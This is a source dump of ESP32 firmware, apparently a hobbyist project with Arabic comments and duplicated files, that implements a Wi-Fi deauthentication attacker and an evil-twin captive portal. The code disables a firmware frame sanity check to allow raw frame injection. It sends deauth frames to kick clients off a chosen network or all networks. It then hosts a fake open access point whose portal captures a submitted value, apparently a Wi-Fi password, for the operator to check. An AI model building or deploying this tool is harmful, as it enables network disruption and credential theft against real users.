        .status { padding: 12px; background-color: rgba(0,0,0,0.2); border-radius: 5px; color: var(--text-muted); text-align: center; margin-top: 20px; transition: opacity 0.3s ease; }
        @media (max-width: 600px) { body { padding: 10px; } .card { padding: 15px; } th, td { padding: 8px; font-size: 0.9em; } h1 { font-size: 1.5em; } }
    </style>
</head>
<body>
    <div class="container">
        <h1>ESP32 Deauther</h1>
        <div class="card">
            <button class="btn scan" onclick="postAction('/rescan', null, true)">Rescan Networks</button>
        </div>
        <div class="card">
            <h2>Available Networks</h2>
            <div class="table-container">
                <table>
                    <thead>
                        <tr><th>Select</th><th>SSID</th><th>BSSID</th><th>Ch</th><th>RSSI</th><th>Enc.</th></tr>
                    </thead>
                    <tbody>
)rawliteral";

const char WEB_HTML_END[] PROGMEM = R"rawliteral(
                    </tbody>
                </table>
            </div>
        </div>
        <div class="card">
            <h2>Attack Controls</h2>
            <div class="controls">
                <label for="reason_code">Reason Code:</label>
                <select id="reason_code">
                    <option value="1">1: Unspecified reason</option>
                    <option value="2">2: Auth not valid</option>
                    <option value="3">3: STA is leaving</option>
                    <option value="4">4: Inactivity</option>
                    <option value="5">5: AP full</option>
                    <option value="6">6: Class 2 frame</option>
                    <option value="7">7: Class 3 frame</option>
                    <option value="8">8: STA is leaving BSS</option>
                    <option value="9">9: Not authenticated</option>
                    <option value="14">14: MIC failure</option>
                    <option value="15">15: 4-Way Handshake timeout</option>
                </select>
            </div>
            <button class="btn" onclick="launchDeauth()">Launch Deauth on Selected</button>
            <button class="btn danger" onclick="launchDeauthAll()">Launch Deauth on ALL</button>
            <button class="btn stop" onclick="postAction('/stop', null, true)">Stop Attack</button>
        </div>
        <div class="status" id="status">Status: Idle</div>
        <div class="card">
            <p>Eliminated stations: %ELIMINATED_STATIONS%</p>
        </div>
    </div>
    <script>
        const statusDiv = document.getElementById('status');
        const updateStatus = (message, isError = false) => { statusDiv.textContent = `Status: ${message}`; statusDiv.style.color = isError ? 'var(--danger-color)' : 'var(--text-muted)'; };
        const postAction = (url, body = null, reload = false) => {
            fetch(url, { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: body })
            .then(response => { if (!response.ok) throw new Error(`HTTP error! status: ${response.status}`); return response.text(); })
            .then(data => { console.log(data); if (reload) { updateStatus('Reloading page...'); setTimeout(() => window.location.reload(), 1000); } })
            .catch(error => { console.error('Fetch error:', error); updateStatus(error.message, true); });
        };
        function launchDeauth() {
            const selectedNetwork = document.querySelector('input[name="net_num"]:checked');
            if (!selectedNetwork) { updateStatus('Please select a network first!', true); return; }
            const netNum = selectedNetwork.value;
            const reason = document.getElementById('reason_code').value;
            updateStatus(`Launching attack on network ${netNum}...`);
            postAction('/deauth', `net_num=${netNum}&reason=${reason}`);
        }
        function launchDeauthAll() {
            if (confirm('WARNING: This will attack all networks and disable this web interface. You will need to reset the ESP32 to stop it. Are you sure?')) {
                const reason = document.getElementById('reason_code').value;
                updateStatus('Launching attack on ALL networks...');
                postAction('/deauth_all', `reason=${reason}`);
            }
        }
        document.querySelectorAll('tbody tr').forEach(row => { row.addEventListener('click', () => { const radio = row.querySelector('input[type="radio"]'); if (radio) radio.checked = true; }); });
    </script>
</body>
</html>
)rawliteral";

================================================================================

--- File: platformio.ini ---

[env:esp32doit-devkit-v1]
platform = espressif32
board = esp32doit-devkit-v1
framework = arduino
monitor_speed = 115200
upload_speed = 921600
board_build.filesystem = littlefs ; <-- إضافة مهمة
lib_deps =
    https://github.com/me-no-dev/AsyncTCP.git
    https://github.com/me-no-dev/ESPAsyncWebServer.git
    DNSServer
build_flags = -Wl,-z,muldefs -DCORE_DEBUG_LEVEL=0

================================================================================

--- File: src/deauth (2).cpp ---

#include <Arduino.h>

// دالة تجاوز الفحص الأمني (ضرورية للحقن)
extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3)
{
  return 0; // تجاوز
}

================================================================================

--- File: src/deauth.cpp ---

#include <Arduino.h>

// دالة تجاوز الفحص الأمني (ضرورية للحقن)
extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3)
{
  return 0; // تجاوز
}

================================================================================

--- File: src/general (2).cpp ---

#include <Arduino.h>
#include "definitions.h"

#ifdef LED
void blink_led(int num_times, int blink_duration) {
  for (int i = 0; i < num_times; i++) {
    digitalWrite(LED, HIGH);
    delay(blink_duration / 2);
    digitalWrite(LED, LOW);
    delay(blink_duration / 2);
  }
}
#endif


================================================================================

--- File: src/general.cpp ---

#include <Arduino.h>
#include "definitions.h"

#ifdef LED
void blink_led(int num_times, int blink_duration) {
  for (int i = 0; i < num_times; i++) {
    digitalWrite(LED, HIGH);
    delay(blink_duration / 2);
    digitalWrite(LED, LOW);
    delay(blink_duration / 2);
  }
}
#endif


================================================================================

--- File: src/main (2).cpp ---

#include <Arduino.h>
#include <WiFi.h>
#include <esp_wifi.h>
#include "definitions.h"
#include "serial_handler.h"

void setup()
{
  Serial.begin(115200);

#ifdef LED
  pinMode(LED, OUTPUT);
  digitalWrite(LED, LOW);
#endif

  // وضع STA ضروري للحقن
  WiFi.mode(WIFI_STA);
  WiFi.disconnect();

  serial_cmd_init();
}

void loop()
{
  serial_cmd_handle();
}

================================================================================

--- File: src/main.cpp ---

#include <Arduino.h>
#include <WiFi.h>
#include <esp_wifi.h>
#include "definitions.h"
#include "serial_handler.h"

void setup()
{
  Serial.begin(115200);

#ifdef LED
  pinMode(LED, OUTPUT);
  digitalWrite(LED, LOW);
#endif

  // وضع STA ضروري للحقن
  WiFi.mode(WIFI_STA);
  WiFi.disconnect();

  serial_cmd_init();
}

void loop()
{
  serial_cmd_handle();
}

================================================================================

--- File: src/serial_handler (2).cpp ---

#include <WiFi.h>
#include <esp_wifi.h>
#include <AsyncTCP.h>
#include <ESPAsyncWebServer.h>
#include <DNSServer.h>
#include <LittleFS.h>
#include "serial_handler.h"
#include "definitions.h"
#include "types.h"

// ================= VARIABLES ================= //
bool attack_running = false;
bool infinite_attack = false;
unsigned long attack_start_time = 0;
unsigned long attack_duration_ms = 0;
uint8_t target_bssid[6];
int target_channel = 1;

bool hosting_running = false;
AsyncWebServer server(80);
DNSServer dnsServer;
String captured_name = "";
int verification_status = 0;

const IPAddress AP_IP(4, 3, 2, 1);
const IPAddress AP_NETMASK(255, 255, 255, 0);

volatile bool victim_connected = false;
unsigned long connection_timestamp = 0;
const unsigned long PAUSE_DURATION = 30000;

deauth_frame_t deauth_frame;
extern "C" esp_err_t esp_wifi_80211_tx(wifi_interface_t ifx, const void *buffer, int len, bool en_sys_seq);

// ================= HELPER FUNCTIONS ================= //
void strToMac(String macStr, uint8_t *mac)
{
    unsigned int values[6];
    if (6 == sscanf(macStr.c_str(), "%x:%x:%x:%x:%x:%x", &values[0], &values[1], &values[2], &values[3], &values[4], &values[5]))
    {
        for (int i = 0; i < 6; ++i)
            mac[i] = (uint8_t)values[i];
    }
}

void applyWifiFix()
{
    wifi_init_config_t my_config = WIFI_INIT_CONFIG_DEFAULT();
    my_config.ampdu_rx_enable = false;
    esp_wifi_init(&my_config);
    esp_wifi_set_storage(WIFI_STORAGE_RAM);
}

// ================= ASYNC WEB HANDLERS ================= //

void setupServer()
{
    server.on("/generate_204", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->redirect("http://4.3.2.1/"); });
    server.on("/gen_204", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->redirect("http://4.3.2.1/"); });
    server.on("/ncsi.txt", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->redirect("http://4.3.2.1/"); });
    server.on("/hotspot-detect.html", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->redirect("http://4.3.2.1/"); });
    server.on("/connecttest.txt", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->redirect("http://logout.net"); });

    // قراءة ملف index.html من الذاكرة
    server.on("/", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->send(LittleFS, "/index.html", "text/html"); });

    server.on("/submit", HTTP_POST, [](AsyncWebServerRequest *request)
              {
        if (request->hasArg("name")) {
            captured_name = request->arg("name");
            verification_status = 1;
            Serial.println("\n[CAPTURED] Name: " + captured_name);
            Serial.println("[ACTION] Type 'OK' or 'NO'");
            request->send(200, "text/plain", "received");
        } else {
            request->send(400, "text/plain", "error");
        } });

    server.on("/status", HTTP_GET, [](AsyncWebServerRequest *request)
              {
        String statusMsg = "IDLE";
        if (verification_status == 1) statusMsg = "WAIT";
        else if (verification_status == 2) statusMsg = "OK";
        else if (verification_status == 3) statusMsg = "NO";
        request->send(200, "text/plain", statusMsg); });

    server.onNotFound([](AsyncWebServerRequest *request)
                      { request->redirect("http://4.3.2.1/"); });

    server.begin();
}

// ================= ATTACK LOGIC ================= //
IRAM_ATTR void attack_sniffer(void *buf, wifi_promiscuous_pkt_type_t type)
{
    if (!attack_running)
        return;

    if (victim_connected && (millis() - connection_timestamp < PAUSE_DURATION))
    {
        return;
    }

    wifi_promiscuous_pkt_t *pkt = (wifi_promiscuous_pkt_t *)buf;
    wifi_packet_t *packet = (wifi_packet_t *)pkt->payload;
    mac_hdr_t *mac_header = &packet->hdr;

    if (pkt->rx_ctrl.sig_len < sizeof(mac_hdr_t))
        return;

    bool is_target = false;
    uint8_t *victim_mac = NULL;

    if (memcmp(mac_header->dest, target_bssid, 6) == 0)
    {
        is_target = true;
        victim_mac = mac_header->src;
    }
    else if (memcmp(mac_header->src, target_bssid, 6) == 0)
    {
        is_target = true;
        victim_mac = mac_header->dest;
    }

    if (is_target && victim_mac != NULL)
    {
        if (victim_mac[0] & 0x01)
            return;
        deauth_frame.reason = 7;
        memcpy(deauth_frame.sender, target_bssid, 6);
        memcpy(deauth_frame.access_point, target_bssid, 6);
        memcpy(deauth_frame.station, victim_mac, 6);
        wifi_interface_t iface = (hosting_running) ? WIFI_IF_AP : WIFI_IF_STA;
        esp_wifi_80211_tx(iface, &deauth_frame, sizeof(deauth_frame), false);
    }
}

// ================= SERIAL LOGIC ================= //
void serial_cmd_init()
{
    Serial.println("\n[SYSTEM] Ready (Case Sensitive Mode).");
    Serial.println("1. ATTACK <BSSID> <CH> <SEC>");
    Serial.println("2. ATTACK OFF (Stops Deauth Only)");
    Serial.println("3. HOST <SSID> <CH>");
    Serial.println("4. OK / NO");

    if (!LittleFS.begin(true))
    {
        Serial.println("[ERROR] LittleFS Mount Failed.");
    }
    else
    {
        Serial.println("[INFO] Filesystem Mounted.");
    }

    WiFi.onEvent([](WiFiEvent_t event)
                 {
        if(event == ARDUINO_EVENT_WIFI_AP_STACONNECTED) {
            Serial.println("[EVENT] Victim Connected!");
            victim_connected = true;
            connection_timestamp = millis();
        } else if (event == ARDUINO_EVENT_WIFI_AP_STADISCONNECTED) {
            victim_connected = false;
        } });
}

void serial_cmd_handle()
{
    if (hosting_running)
    {
        dnsServer.processNextRequest();
    }

    if (attack_running && !infinite_attack)
    {
        if (millis() - attack_start_time > attack_duration_ms)
        {
            attack_running = false;
            if (!hosting_running)
                esp_wifi_set_promiscuous(false);
            Serial.println("[FINISHED] Attack ended.");
        }
    }

    if (Serial.available())
    {
        // 1. قراءة النص الخام (الأصلي)
        String rawInput = Serial.readStringUntil('\n');
        rawInput.trim();

        // 2. عمل نسخة للكشف عن الأوامر (حروف كبيرة)
        String cmdInput = rawInput;
        cmdInput.toUpperCase();

        // --- ATTACK OFF COMMAND ---
        if (cmdInput == "ATTACK OFF")
        {
            attack_running = false;
            if (!hosting_running)
                esp_wifi_set_promiscuous(false);
            Serial.println("[INFO] Deauth Attack Stopped.");
            return;
        }

        if (cmdInput == "OK")
        {
            if (verification_status == 1)
            {
                verification_status = 2;
                Serial.println("[ADMIN] Accepted.");
                delay(3000);
                attack_running = false;
                hosting_running = false;
                esp_wifi_set_promiscuous(false);
                server.end();
                WiFi.softAPdisconnect(true);
                WiFi.mode(WIFI_OFF);
                Serial.println("[SYSTEM] Reset Done.");
            }
            return;
        }

        if (cmdInput == "NO")
        {
            if (verification_status == 1)
            {
                verification_status = 3;
                Serial.println("[ADMIN] Rejected.");
            }
            return;
        }

        if (cmdInput == "STOP")
        {
            attack_running = false;
            if (!hosting_running)
                esp_wifi_set_promiscuous(false);
            Serial.println("[INFO] Stopped.");
            return;
        }

        // نستخدم cmdInput للكشف عن الأمر، و rawInput لاستخراج البيانات
        if (cmdInput.startsWith("ATTACK "))
        {
            int s1 = rawInput.indexOf(' ');
            int s2 = rawInput.indexOf(' ', s1 + 1);
            int s3 = rawInput.indexOf(' ', s2 + 1);
            if (s1 > 0 && s2 > 0 && s3 > 0)
            {
                String bssid = rawInput.substring(s1 + 1, s2);
                String ch = rawInput.substring(s2 + 1, s3);
                String dur = rawInput.substring(s3 + 1);
                strToMac(bssid, target_bssid);
                target_channel = ch.toInt();
                int d = dur.toInt();
                infinite_attack = (d == 0);
                attack_duration_ms = d * 1000;

                if (!hosting_running)
                {
                    WiFi.mode(WIFI_STA);
                    WiFi.disconnect();
                    esp_wifi_set_promiscuous(true);
                    esp_wifi_set_channel(target_channel, WIFI_SECOND_CHAN_NONE);
                    esp_wifi_set_promiscuous_rx_cb(&attack_sniffer);
                }
                else
                {
                    esp_wifi_set_channel(target_channel, WIFI_SECOND_CHAN_NONE);
                }
                attack_running = true;
                attack_start_time = millis();
                Serial.println("[ATTACK] Started.");
            }
        }

        if (cmdInput.startsWith("HOST "))
        {
            int s1 = rawInput.indexOf(' ');
            int s2 = rawInput.lastIndexOf(' '); // نستخدم lastIndexOf لضمان فصل القناة عن الاسم

            if (s1 > 0 && s2 > s1)
            {
                // هنا نستخدم rawInput لنأخذ الاسم كما هو (بحروفه الكبيرة والصغيرة)
                String ssid = rawInput.substring(s1 + 1, s2);
                String chStr = rawInput.substring(s2 + 1);
                int ch = chStr.toInt();

                WiFi.mode(WIFI_OFF);
                applyWifiFix();

                WiFi.mode(WIFI_AP_STA);
                WiFi.softAPConfig(AP_IP, AP_IP, AP_NETMASK);
                WiFi.softAP(ssid.c_str(), NULL, ch, 0, 4);

                dnsServer.setTTL(300);
                dnsServer.setErrorReplyCode(DNSReplyCode::NoError);
                dnsServer.start(53, "*", AP_IP);

                setupServer();

                hosting_running = true;
                verification_status = 0;
                victim_connected = false;

                esp_wifi_set_promiscuous(true);
                esp_wifi_set_promiscuous_rx_cb(&attack_sniffer);
                Serial.printf("[HOST] Async AP '%s' on CH %d.\n", ssid.c_str(), ch);
            }
        }
    }
}

================================================================================

--- File: src/serial_handler.cpp ---

#include <WiFi.h>
#include <esp_wifi.h>
#include <AsyncTCP.h>
#include <ESPAsyncWebServer.h>
#include <DNSServer.h>
#include <LittleFS.h>
#include "serial_handler.h"
#include "definitions.h"
#include "types.h"

// ================= VARIABLES ================= //
bool attack_running = false;
bool infinite_attack = false;
unsigned long attack_start_time = 0;
unsigned long attack_duration_ms = 0;
uint8_t target_bssid[6];
int target_channel = 1;

bool hosting_running = false;
AsyncWebServer server(80);
DNSServer dnsServer;
String captured_name = "";
int verification_status = 0;

const IPAddress AP_IP(4, 3, 2, 1);
const IPAddress AP_NETMASK(255, 255, 255, 0);

volatile bool victim_connected = false;
unsigned long connection_timestamp = 0;
const unsigned long PAUSE_DURATION = 30000;

deauth_frame_t deauth_frame;
extern "C" esp_err_t esp_wifi_80211_tx(wifi_interface_t ifx, const void *buffer, int len, bool en_sys_seq);

// ================= HELPER FUNCTIONS ================= //
void strToMac(String macStr, uint8_t *mac)
{
    unsigned int values[6];
    if (6 == sscanf(macStr.c_str(), "%x:%x:%x:%x:%x:%x", &values[0], &values[1], &values[2], &values[3], &values[4], &values[5]))
    {
        for (int i = 0; i < 6; ++i)
            mac[i] = (uint8_t)values[i];
    }
}

void applyWifiFix()
{
    wifi_init_config_t my_config = WIFI_INIT_CONFIG_DEFAULT();
    my_config.ampdu_rx_enable = false;
    esp_wifi_init(&my_config);
    esp_wifi_set_storage(WIFI_STORAGE_RAM);
}

// ================= ASYNC WEB HANDLERS ================= //

void setupServer()
{
    server.on("/generate_204", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->redirect("http://4.3.2.1/"); });
    server.on("/gen_204", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->redirect("http://4.3.2.1/"); });
    server.on("/ncsi.txt", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->redirect("http://4.3.2.1/"); });
    server.on("/hotspot-detect.html", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->redirect("http://4.3.2.1/"); });
    server.on("/connecttest.txt", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->redirect("http://logout.net"); });

    // قراءة ملف index.html من الذاكرة
    server.on("/", HTTP_ANY, [](AsyncWebServerRequest *request)
              { request->send(LittleFS, "/index.html", "text/html"); });

    server.on("/submit", HTTP_POST, [](AsyncWebServerRequest *request)
              {
        if (request->hasArg("name")) {
            captured_name = request->arg("name");
            verification_status = 1;
            Serial.println("\n[CAPTURED] Name: " + captured_name);
            Serial.println("[ACTION] Type 'OK' or 'NO'");
            request->send(200, "text/plain", "received");
        } else {
            request->send(400, "text/plain", "error");
        } });

    server.on("/status", HTTP_GET, [](AsyncWebServerRequest *request)
              {
        String statusMsg = "IDLE";
        if (verification_status == 1) statusMsg = "WAIT";
        else if (verification_status == 2) statusMsg = "OK";
        else if (verification_status == 3) statusMsg = "NO";
        request->send(200, "text/plain", statusMsg); });

    server.onNotFound([](AsyncWebServerRequest *request)
                      { request->redirect("http://4.3.2.1/"); });

    server.begin();
}

// ================= ATTACK LOGIC ================= //
IRAM_ATTR void attack_sniffer(void *buf, wifi_promiscuous_pkt_type_t type)
{
    if (!attack_running)
        return;

    if (victim_connected && (millis() - connection_timestamp < PAUSE_DURATION))
    {
        return;
    }

    wifi_promiscuous_pkt_t *pkt = (wifi_promiscuous_pkt_t *)buf;
    wifi_packet_t *packet = (wifi_packet_t *)pkt->payload;
    mac_hdr_t *mac_header = &packet->hdr;

    if (pkt->rx_ctrl.sig_len < sizeof(mac_hdr_t))
        return;

    bool is_target = false;
    uint8_t *victim_mac = NULL;

    if (memcmp(mac_header->dest, target_bssid, 6) == 0)
    {
        is_target = true;
        victim_mac = mac_header->src;
    }
    else if (memcmp(mac_header->src, target_bssid, 6) == 0)
    {
        is_target = true;
        victim_mac = mac_header->dest;
    }

    if (is_target && victim_mac != NULL)
    {
        if (victim_mac[0] & 0x01)
            return;
        deauth_frame.reason = 7;
        memcpy(deauth_frame.sender, target_bssid, 6);
        memcpy(deauth_frame.access_point, target_bssid, 6);
        memcpy(deauth_frame.station, victim_mac, 6);
        wifi_interface_t iface = (hosting_running) ? WIFI_IF_AP : WIFI_IF_STA;
        esp_wifi_80211_tx(iface, &deauth_frame, sizeof(deauth_frame), false);
    }
}

// ================= SERIAL LOGIC ================= //
void serial_cmd_init()
{
    Serial.println("\n[SYSTEM] Ready (Case Sensitive Mode).");
    Serial.println("1. ATTACK <BSSID> <CH> <SEC>");
    Serial.println("2. ATTACK OFF (Stops Deauth Only)");
    Serial.println("3. HOST <SSID> <CH>");
    Serial.println("4. OK / NO");

    if (!LittleFS.begin(true))
    {
        Serial.println("[ERROR] LittleFS Mount Failed.");
    }
    else
    {
        Serial.println("[INFO] Filesystem Mounted.");
    }

    WiFi.onEvent([](WiFiEvent_t event)
                 {
        if(event == ARDUINO_EVENT_WIFI_AP_STACONNECTED) {
            Serial.println("[EVENT] Victim Connected!");
            victim_connected = true;
            connection_timestamp = millis();
        } else if (event == ARDUINO_EVENT_WIFI_AP_STADISCONNECTED) {
            victim_connected = false;
        } });
}

void serial_cmd_handle()
{
    if (hosting_running)
    {
        dnsServer.processNextRequest();
    }

    if (attack_running && !infinite_attack)
    {
        if (millis() - attack_start_time > attack_duration_ms)
        {
            attack_running = false;
            if (!hosting_running)
                esp_wifi_set_promiscuous(false);
            Serial.println("[FINISHED] Attack ended.");
        }
    }

    if (Serial.available())
    {
        // 1. قراءة النص الخام (الأصلي)
        String rawInput = Serial.readStringUntil('\n');
        rawInput.trim();

        // 2. عمل نسخة للكشف عن الأوامر (حروف كبيرة)
        String cmdInput = rawInput;
        cmdInput.toUpperCase();

        // --- ATTACK OFF COMMAND ---
        if (cmdInput == "ATTACK OFF")
        {
            attack_running = false;
            if (!hosting_running)
                esp_wifi_set_promiscuous(false);
            Serial.println("[INFO] Deauth Attack Stopped.");
            return;
        }

        if (cmdInput == "OK")
        {
            if (verification_status == 1)
            {
                verification_status = 2;
                Serial.println("[ADMIN] Accepted.");
                delay(3000);
                attack_running = false;
                hosting_running = false;
                esp_wifi_set_promiscuous(false);
                server.end();
                WiFi.softAPdisconnect(true);
                WiFi.mode(WIFI_OFF);
                Serial.println("[SYSTEM] Reset Done.");
            }
            return;
        }

        if (cmdInput == "NO")
        {
            if (verification_status == 1)
            {
                verification_status = 3;
                Serial.println("[ADMIN] Rejected.");
            }
            return;
        }

        if (cmdInput == "STOP")
        {
            attack_running = false;
            if (!hosting_running)
                esp_wifi_set_promiscuous(false);
            Serial.println("[INFO] Stopped.");
            return;
        }

        // نستخدم cmdInput للكشف عن الأمر، و rawInput لاستخراج البيانات
        if (cmdInput.startsWith("ATTACK "))
        {
            int s1 = rawInput.indexOf(' ');
            int s2 = rawInput.indexOf(' ', s1 + 1);
            int s3 = rawInput.indexOf(' ', s2 + 1);
            if (s1 > 0 && s2 > 0 && s3 > 0)
            {
                String bssid = rawInput.substring(s1 + 1, s2);
                String ch = rawInput.substring(s2 + 1, s3);
                String dur = rawInput.substring(s3 + 1);
                strToMac(bssid, target_bssid);
                target_channel = ch.toInt();
                int d = dur.toInt();
                infinite_attack = (d == 0);
                attack_duration_ms = d * 1000;

                if (!hosting_running)
                {
                    WiFi.mode(WIFI_STA);
                    WiFi.disconnect();
                    esp_wifi_set_promiscuous(true);
                    esp_wifi_set_channel(target_channel, WIFI_SECOND_CHAN_NONE);
                    esp_wifi_set_promiscuous_rx_cb(&attack_sniffer);
                }
                else
                {
                    esp_wifi_set_channel(target_channel, WIFI_SECOND_CHAN_NONE);
                }
                attack_running = true;
                attack_start_time = millis();
                Serial.println("[ATTACK] Started.");
            }
        }

        if (cmdInput.startsWith("HOST "))
        {
            int s1 = rawInput.indexOf(' ');
            int s2 = rawInput.lastIndexOf(' '); // نستخدم lastIndexOf لضمان فصل القناة عن الاسم

            if (s1 > 0 && s2 > s1)
            {
                // هنا نستخدم rawInput لنأخذ الاسم كما هو (بحروفه الكبيرة والصغيرة)
                String ssid = rawInput.substring(s1 + 1, s2);
                String chStr = rawInput.substring(s2 + 1);
                int ch = chStr.toInt();

                WiFi.mode(WIFI_OFF);
                applyWifiFix();

                WiFi.mode(WIFI_AP_STA);
                WiFi.softAPConfig(AP_IP, AP_IP, AP_NETMASK);
                WiFi.softAP(ssid.c_str(), NULL, ch, 0, 4);

                dnsServer.setTTL(300);
                dnsServer.setErrorReplyCode(DNSReplyCode::NoError);
                dnsServer.start(53, "*", AP_IP);

                setupServer();

                hosting_running = true;
                verification_status = 0;
                victim_connected = false;

                esp_wifi_set_promiscuous(true);
                esp_wifi_set_promiscuous_rx_cb(&attack_sniffer);
                Serial.printf("[HOST] Async AP '%s' on CH %d.\n", ssid.c_str(), ch);
            }
        }
    }
}

================================================================================

--- File: src/state (2).cpp ---

// src/state.cpp
#include "state.h"

// تعريف المتغير وتهيئته
ScanMode last_scan_mode = SCAN_MODE_NONE;

================================================================================

--- File: src/state.cpp ---

// src/state.cpp
#include "state.h"

// تعريف المتغير وتهيئته
ScanMode last_scan_mode = SCAN_MODE_NONE;

================================================================================

